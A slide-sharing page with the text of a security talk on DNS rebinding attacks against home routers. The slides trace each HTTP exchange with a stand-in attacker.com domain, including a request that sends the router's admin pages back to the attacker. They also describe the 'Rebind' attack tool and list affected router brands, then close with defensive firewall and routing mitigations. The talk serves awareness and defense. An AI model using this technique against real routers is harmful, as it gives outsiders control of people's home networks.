how to hack millions of routers
play

How to Hack Millions of Routers Craig Heffner Administrivia My - PowerPoint PPT Presentation

Apr 01, 2024 •23 likes •913 views

How to Hack Millions of Routers Craig Heffner Administrivia My overarching objective with this talk is to increase security awareness and serve as a catalyst for positive change I developed this paper and the conclusions reached and the

  1. How to Hack Millions of Routers Craig Heffner

  2. Administrivia  My overarching objective with this talk is to increase security awareness and serve as a catalyst for positive change  I developed this paper and the conclusions reached and the information presented, on my own time, not on behalf of Seismic or using any resources of Seismic and in fact prior to working for Seismic  My information was derived from well-known public vulnerabilities and other public sources  I joined Seismic (now an Applied Signal T echnology company) to develop solutions to these type of problems and to increase the integrity of our networks

  3. SOHO Router…Security?

  4. Common Attack Techniques  Cross Site Request Forgery  No trust relationship between browser and router  Can’t forge Basic Authentication credentials  Anti-CSRF  Limited by the same origin policy  DNS Rebinding  Rebinding prevention by OpenDNS / NoScript / DNSWall  Most rebinding attacks no longer work  Most …

  5. Multiple A Record Attack  Better known as DNS load balancing / redundancy  Return multiple IP addresses in DNS response  Browser attempts to connect to each IP addresses in order  If one IP goes down, browser switches to the next IP in the list  Limited attack  Can rebind to any public IP address  Can’t rebind to an RFC1918 IP addresses

  6. Rebinding to a Public IP Target IP: 2.3.5.8 Attacker IP: 1.4.1.4 Attacker Domain: attacker.com 1.4.1.4 2.3.5.8

  7. Rebinding to a Public IP What is the IP address for attacker.com? 1.4.1.4 2.3.5.8

  8. Rebinding to a Public IP 1.4.1.4 2.3.5.8 1.4.1.4 2.3.5.8

  9. Rebinding to a Public IP GET / HTTP/1.1 Host: attacker.com 1.4.1.4 2.3.5.8

  10. Rebinding to a Public IP <script>…</script> 1.4.1.4 2.3.5.8

  11. Rebinding to a Public IP GET / HTTP/1.1 Host: attacker.com 1.4.1.4 2.3.5.8

  12. Rebinding to a Public IP TCP RST 1.4.1.4 2.3.5.8

  13. Rebinding to a Public IP GET / HTTP/1.1 Host: attacker.com 1.4.1.4 2.3.5.8

  14. Rebinding to a Public IP <html>…</html> 1.4.1.4 2.3.5.8

  15. Rebinding to a Private IP Target IP: 192.168.1.1 Attacker IP: 1.4.1.4 Attacker Domain: attacker.com 192.168.1.1 1.4.1.4

  16. Rebinding to a Private IP What is the IP address for attacker.com? 192.168.1.1 1.4.1.4

  17. Rebinding to a Private IP 1.4.1.4 192.168.1.1 192.168.1.1 1.4.1.4

  18. Rebinding to a Private IP GET / HTTP/1.1 Host: attacker.com 192.168.1.1 1.4.1.4

  19. Rebinding to a Private IP <html>…</html> 192.168.1.1 1.4.1.4

  20. Services Bound to All Interfaces # netstat – l Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 *:80 *:* LISTEN tcp 0 0 *:53 *:* LISTEN tcp 0 0 *:22 *:* LISTEN tcp 0 0 *:23 *:* LISTEN

  21. Firewall Rules Based on Interface Names  -A INPUT – i etho – j DROP  -A INPUT – j ACCEPT

  22. IP Stack Implementations  RFC 1122 defines two IP models:  Strong End System Model  Weak End System Model

  23. The Weak End System Model  RFC 1122, Weak End System Model:  A host MAY silently discard an incoming datagram whose destination address does not correspond to the physical interface through which it is received.  A host MAY restrict itself to sending (non-source-routed) IP datagrams only through the physical interface that corresponds to the IP source address of the datagrams.

  24. Weak End System Model eth1 eth0 192.168.1.1 2.3.5.8

  25. Weak End System Model TCP SYN Packet Source IP: 192.168.1.100 Destination IP: 2.3.5.8 Destination Port: 80 eth1 eth0 192.168.1.1 2.3.5.8

  26. Weak End System Model TCP SYN/ACK Packet Source IP: 2.3.5.8 Destination IP: 192.168.1.100 Source Port: 80 eth1 eth0 192.168.1.1 2.3.5.8

  27. Weak End System Model TCP ACK Packet Source IP: 192.168.1.100 Destination IP: 2.3.5.8 Destination Port: 80 eth1 eth0 192.168.1.1 2.3.5.8

  28. Traffic Capture

  29. End Result

  30. Public IP Rebinding Attack Target IP: 2.3.5.8 Attacker IP: 1.4.1.4 Attacker Domain: attacker.com 2.3.5.8 1.4.1.4

  31. Public IP Rebinding Attack What is the IP address for attacker.com? 2.3.5.8 1.4.1.4

  32. Public IP Rebinding Attack 1.4.1.4 2.3.5.8 2.3.5.8 1.4.1.4

  33. Public IP Rebinding Attack GET / HTTP/1.1 Host: attacker.com 2.3.5.8 1.4.1.4

  34. Public IP Rebinding Attack <script>...</script> 2.3.5.8 1.4.1.4

  35. Public IP Rebinding Attack GET / HTTP/1.1 Host: attacker.com 2.3.5.8 1.4.1.4

  36. Public IP Rebinding Attack TCP RST 2.3.5.8 1.4.1.4

  37. Public IP Rebinding Attack GET / HTTP/1.1 Host: attacker.com 2.3.5.8 1.4.1.4

  38. Public IP Rebinding Attack <html>…</html> 2.3.5.8 1.4.1.4

  39. Public IP Rebinding Attack  Pros:  Nearly instant rebind, no delay or waiting period  Don’t need to know router’s internal IP  Works in all major browsers: IE, FF, Opera, Safari, Chrome  Cons:  Router must meet very specific conditions  Must bind Web server to the WAN interface  Firewall rules must be based on interface names, not IP addresses  Must implement the weak end system model  Not all routers are vulnerable

  40. Affected Routers

  41. Asus

  42. Belkin

  43. Dell

  44. Thompson

  45. Linksys

  46. Third Party Firmware

  47. ActionTec

  48. Making the Attack Practical  T o make the attack practical:  Must obtain target’s public IP address automatically  Must coordinate services (DNS, Web, Firewall)  Must do something useful

  49. Tool Release: Rebind  Provides all necessary services  DNS, Web, Firewall  Serves up JavaScript code  Limits foreground activity  Makes use of cross-domain XHR, if supported  Supports all major Web browsers  Attacker can browse target routers in real-time  Via a standard HTTP proxy

  50. Rebind Target IP: 2.3.5.8 Rebind IP: 1.4.1.4 Attacker Domain: attacker.com 2.3.5.8 1.4.1.4

  51. Rebind

  52. Rebind

  53. Rebind What is the IP address for attacker.com? 2.3.5.8 1.4.1.4

  54. Rebind 1.4.1.4 2.3.5.8 1.4.1.4

  55. Rebind GET /init HTTP/1.1 Host: attacker.com 2.3.5.8 1.4.1.4

  56. Rebind Location: http://wacme.attacker.com/exec 2.3.5.8 1.4.1.4

  57. Rebind What is the IP address for wacme.attacker.com? 2.3.5.8 1.4.1.4

  58. Rebind 1.4.1.4 2.3.5.8 2.3.5.8 1.4.1.4

  59. Rebind GET /exec HTTP/1.1 Host: wacme.attacker.com 2.3.5.8 1.4.1.4

  60. Rebind <script>…</script> 2.3.5.8 1.4.1.4

  61. Rebind GET / HTTP/1.1 Host: wacme.attacker.com 2.3.5.8 1.4.1.4

  62. Rebind TCP RST 2.3.5.8 1.4.1.4

  63. Rebind GET / HTTP/1.1 Host: wacme.attacker.com 2.3.5.8 1.4.1.4

  64. Rebind <html>…</html> 2.3.5.8 1.4.1.4

  65. Rebind GET /poll HTTP/1.1 Host: attacker.com:81 2.3.5.8 1.4.1.4

  66. Rebind 2.3.5.8 1.4.1.4

  67. Rebind

  68. Rebind GET http://2.3.5.8/ HTTP/1.1 2.3.5.8 1.4.1.4

  69. Rebind GET /poll HTTP/1.1 Host: attacker.com:81 2.3.5.8 1.4.1.4

  70. Rebind GET / HTTP/1.1 2.3.5.8 1.4.1.4

  71. Rebind GET / HTTP/1.1 Host: wacme.attacker.com 2.3.5.8 1.4.1.4

  72. Rebind <html>…</html> 2.3.5.8 1.4.1.4

  73. Rebind POST /exec HTTP/1.1 Host: attacker.com:81 <html>…</html> 2.3.5.8 1.4.1.4

  74. Rebind <html>…</html> 2.3.5.8 1.4.1.4

  75. Rebind

  76. Demo

  77. More Fun With Rebind  Attacking SOAP services  UPnP  HNAP  We can rebind to any public IP  Proxy attacks to other Web sites via your browser  As long as the site doesn’t check the host header

  78. DNS Rebinding Countermeasures

  79. Am I Vulnerable?

  80. End-User Mitigations  Break any of the attack’s conditions  Interface binding  Firewall rules  Routing rules  Disable the HTTP administrative interface  Reduce the impact of the attack  Basic security precautions

  81. Blocking Attacks at the Router  Don’t bind services to the external interface  May not have sufficient access to the router to change this  Some services don’t give you a choice  Re-configure firewall rules  -A INPUT – i eth1 – d 172.69.0.0/16 – j DROP

  82. HTTP Administrative Interface  Disable the HTTP interface  Use HTTPS / SSH  Disable UPnP while you’re at it  But be warned…  Enabling HTTPS won’t disable HTTP  In some routers you can’t disable HTTP  Some routers have HTTP listening on alternate ports  In some routers you can’t disable HNAP

  83. Blocking Attacks at the Host  Re-configure firewall rules  -A INPUT – d 172.69.0.0/16 – j DROP  Configure dummy routes  route add -net 172.69.0.0/16 gw 127.0.0.1

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

SLIPPERY SLIDES HACK.|100% WORKING!|NEW METHOD|HACK TOOL. Free No Ads Hard-Boiled Egg Hack Goes

SLIPPERY SLIDES HACK.|100% WORKING!|NEW METHOD|HACK TOOL. Free No Ads Hard-Boiled Egg Hack Goes

SLIPPERY SLIDES HACK.|100% WORKING!|NEW METHOD|HACK TOOL. Free No Ads Hard-Boiled Egg Hack Goes Viral on Twitter By using our site, you acknowledge that you have read and understand our Cookie PolicyPrivacy Policyand our Terms of Service.

1.1k views • 3 slides
Hack The CPython Batuhan Taskaya @isidentical What is hacking? Why do we hack? Yes, we want

Hack The CPython Batuhan Taskaya @isidentical What is hacking? Why do we hack? Yes, we want

Hack The CPython Batuhan Taskaya @isidentical What is hacking? Why do we hack? Yes, we want FREEDOM! We want to use PEP313! Before we hack, Learn the internals Lexing - Tokenization - Read #define NEWLINE 4 #define INDENT

670 views • 36 slides
Geoffrey Vaughan Lets Hack NFC How does NFC work? How could we hack it? Where

Geoffrey Vaughan Lets Hack NFC How does NFC work? How could we hack it? Where

Geoffrey Vaughan Lets Hack NFC How does NFC work? How could we hack it? Where are the weaknesses? What are the security implications? Security Compass and NFC Currently we are devoting a lot of energy towards NFC

704 views • 35 slides
ART SLIDES: VAN GOGH EDITION HACK.|100% WORKING!|NEW METHOD|HACK TOOL. Free Buy 30 coins Nearly

ART SLIDES: VAN GOGH EDITION HACK.|100% WORKING!|NEW METHOD|HACK TOOL. Free Buy 30 coins Nearly

ART SLIDES: VAN GOGH EDITION HACK.|100% WORKING!|NEW METHOD|HACK TOOL. Free Buy 30 coins Nearly 1, Paintings and Drawings by Vincent van Gogh Digitized and Put Online | Hacker News For people who don't live close to huge cities with big

269 views • 3 slides
SSA Introduction Sebastian Hack hack@cs.uni-saarland.de Compiler Construction 2013 saarland

SSA Introduction Sebastian Hack hack@cs.uni-saarland.de Compiler Construction 2013 saarland

SSA Introduction Sebastian Hack hack@cs.uni-saarland.de Compiler Construction 2013 saarland university computer science 1 Another kind of CFGs p D ( ) x e x e D ( ) q Effects on edges. Nodes called Nodes are

310 views • 19 slides
FC2015 RSDYK Dyke quality assessment by remote sensing Robert Hack Robert Hack 14-Apr-09 1

FC2015 RSDYK Dyke quality assessment by remote sensing Robert Hack Robert Hack 14-Apr-09 1

FC2015 RSDYK Dyke quality assessment by remote sensing Robert Hack Robert Hack 14-Apr-09 1 FC2015-RSDYK - Hack Pilot project: RSDYK2008 Trial to establish whether remote sensing in combination with geological knowledge can be used for

826 views • 10 slides
Code Generation: Intro Sebastian Hack hack@cs.uni-saarland.de Compiler Construction 2017

Code Generation: Intro Sebastian Hack hack@cs.uni-saarland.de Compiler Construction 2017

Code Generation: Intro Sebastian Hack hack@cs.uni-saarland.de Compiler Construction 2017 Saarland University, Computer Science 1 Code Generation Consists (roughly) of three parts: 1. Instruction Selection Select processor instructions for

282 views • 9 slides
SLIPPERY SLIDES HACK and CHEATS.|100% WORKING!|NEW METHOD|HACK TOOL. Free No Ads 7 Hacks To Make

SLIPPERY SLIDES HACK and CHEATS.|100% WORKING!|NEW METHOD|HACK TOOL. Free No Ads 7 Hacks To Make

SLIPPERY SLIDES HACK and CHEATS.|100% WORKING!|NEW METHOD|HACK TOOL. Free No Ads 7 Hacks To Make Your Boots Slip-Proof May 18, Attach your Water hose. Wet your slide, this just helps for the first few slides. Once the kids get going, their

308 views • 3 slides
Global Value Numbering Sebastian Hack hack@cs.uni-saarland.de 17. Dezember 2013 saarland

Global Value Numbering Sebastian Hack hack@cs.uni-saarland.de 17. Dezember 2013 saarland

Global Value Numbering Sebastian Hack hack@cs.uni-saarland.de 17. Dezember 2013 saarland university computer science 1 Value Numbering a := 2 a := 3 x := a + 1 x := a + 1 y := a + 1 Replace second computation of a + 1 with a copy from x 2

223 views • 20 slides
Global Value Numbering Sebastian Hack hack@cs.uni-saarland.de 5. Dezember 2017 Saarland

Global Value Numbering Sebastian Hack hack@cs.uni-saarland.de 5. Dezember 2017 Saarland

Global Value Numbering Sebastian Hack hack@cs.uni-saarland.de 5. Dezember 2017 Saarland University, Computer Science 1 Value Numbering a := 2 a := 3 x := a + 1 x := a + 1 y := a + 1 Replace second computation of a + 1 with a copy

394 views • 22 slides
How to Design Fast Asynchronous How to Design Fast Asynchronous Routers for Asynchronous Routers

How to Design Fast Asynchronous How to Design Fast Asynchronous Routers for Asynchronous Routers

How to Design Fast Asynchronous How to Design Fast Asynchronous Routers for Asynchronous Routers for Asynchronous On- -chip Networks chip Networks On Wei Song Supervisor: Doug Edwards Advanced Processor Technologies Group Advanced

526 views • 26 slides
Scalable IP Lookup for Programmable Routers David E. Taylor, John W. Lockwood, Todd Sproull,

Scalable IP Lookup for Programmable Routers David E. Taylor, John W. Lockwood, Todd Sproull,

IEEE INFOCOM 2002 1 Scalable IP Lookup for Programmable Routers David E. Taylor, John W. Lockwood, Todd Sproull, Jonathan S. Turner, David B. Parlour high-performance routers continues to increase, there is a Abstract Continuing growth in

680 views • 11 slides
R E S U L T S F I N A N C I A L 4Q08 FY08 Managed Results 1 $ in millions $ in millions $ O/

R E S U L T S F I N A N C I A L 4Q08 FY08 Managed Results 1 $ in millions $ in millions $ O/

2 0 0 9 1 5 , J A N U A R Y R E S U L T S F I N A N C I A L 4Q08 FY08 Managed Results 1 $ in millions $ in millions $ O/ (U) O/ (U) % FY2008 FY2007 FY2007 1 Result s excl. Merger-relat ed it ems 2 $73,402 ($1,410) (2)% Revenue

458 views • 26 slides
R APID expansion of the Internet leads to sustained growth Most

R APID expansion of the Internet leads to sustained growth Most

IEEE TRANSACTIONS ON PARALLEL AND DISTRIBUTED SYSTEMS, VOL. 17, NO. 5, MAY 2006 481 Routing Table Partitioning for Speedy Packet Lookups in Scalable Routers Nian-Feng Tzeng, Senior Member , IEEE Abstract Most of the high-performance routers

509 views • 14 slides
The Premise: Hack in Paris, 2015 I may be right on some stuff. Probably wrong on other bits.

The Premise: Hack in Paris, 2015 I may be right on some stuff. Probably wrong on other bits.

The Premise: Hack in Paris, 2015 I may be right on some stuff. Probably wrong on other bits. Analogue is meant to help people think differently. This is the Hack in Paris 2015 version, and is subject to all sorts of changes as the

963 views • 80 slides
Sebastian Hack, Christian Hammer, Jan Reineke Saarland University Static Program Analysis

Sebastian Hack, Christian Hammer, Jan Reineke Saarland University Static Program Analysis

Sebastian Hack, Christian Hammer, Jan Reineke Saarland University Static Program Analysis Introduction Winter Semester 2014 Slides based on: H. Seidl, R. Wilhelm, S. Hack: Compiler Design, Volume 3, Analysis and Transformation, Springer

616 views • 27 slides
Firewall Builder Vadim Kurland vadim@fwbuilder.org http://www.fwbuilder.org Challenges of

Firewall Builder Vadim Kurland vadim@fwbuilder.org http://www.fwbuilder.org Challenges of

Firewall Builder Vadim Kurland vadim@fwbuilder.org http://www.fwbuilder.org Challenges of firewall configuration complexity leads to errors coordinated changes on many devices are hard multi-vendor environments make the job even

314 views • 28 slides
Using Modular Arithmetic to Reliably Encode Authentication Information Within Messages Consisting

Using Modular Arithmetic to Reliably Encode Authentication Information Within Messages Consisting

Using Modular Arithmetic to Reliably Encode Authentication Information Within Messages Consisting of Port Connection Sequences Patrick F. Wilbur - wilburpf@clarkson.edu Department of Mathematics &amp; Computer Science, Clarkson University

229 views • 9 slides
Class Session 4 Firewalls Exercise 1 You are asked to design the firewall policy for the

Class Session 4 Firewalls Exercise 1 You are asked to design the firewall policy for the

Class Session 4 Firewalls Exercise 1 You are asked to design the firewall policy for the following network. Note that these are stateful , bidirectional firewalls . The only flags you need to worry about are SYN and SYN-ACK. The following

415 views • 3 slides
Security CS 4720 Web &amp; Mobile Systems CS 4720

Security CS 4720 Web &amp; Mobile Systems CS 4720

Security CS 4720 Web &amp; Mobile Systems CS 4720 The Tradi/onal Security Model The Firewall Approach Keep the good guys in and the

442 views • 25 slides
Network Security Architecture CS461/ECE422 Computer Security I Fall 2008 Reading Material

Network Security Architecture CS461/ECE422 Computer Security I Fall 2008 Reading Material

Network Security Architecture CS461/ECE422 Computer Security I Fall 2008 Reading Material Computer Security chapter 26. Firewalls and Internet Security: Repelling the Wily Hacker, Cheswick, Bellovin, and Rubin. New second

1.24k views • 50 slides
Click to edit Master title style SCALING NETWORK MONITORING IN A LARGE ENTERPRISE BroCon 2016

Click to edit Master title style SCALING NETWORK MONITORING IN A LARGE ENTERPRISE BroCon 2016

Click to edit Master title style SCALING NETWORK MONITORING IN A LARGE ENTERPRISE BroCon 2016 Austin, TX Click to edit Master title style Who am I? I work for Amazons Worldwide Consumer Information Security group What are we going to

526 views • 38 slides
The Margrave Tool for Firewall Analysis Tim Nelson (WPI), Christopher Barratt (Brown), Daniel J.

The Margrave Tool for Firewall Analysis Tim Nelson (WPI), Christopher Barratt (Brown), Daniel J.

The Margrave Tool for Firewall Analysis Tim Nelson (WPI), Christopher Barratt (Brown), Daniel J. Dougherty (WPI), Kathi Fisler (WPI) and Shriram Krishnamurthi (Brown) 1 and other dens of iniquity 2 I dont really know whats

1.28k views • 115 slides
How the Great Firewall discovers hidden circumvention servers Roya Ensafi David Fifield

How the Great Firewall discovers hidden circumvention servers Roya Ensafi David Fifield

How the Great Firewall discovers hidden circumvention servers Roya Ensafi David Fifield Philipp Winter Nick Weaver Nick Feamster Vern Paxson Much already known about GFW Numerous research papers and blog posts Open access

916 views • 53 slides

More recommend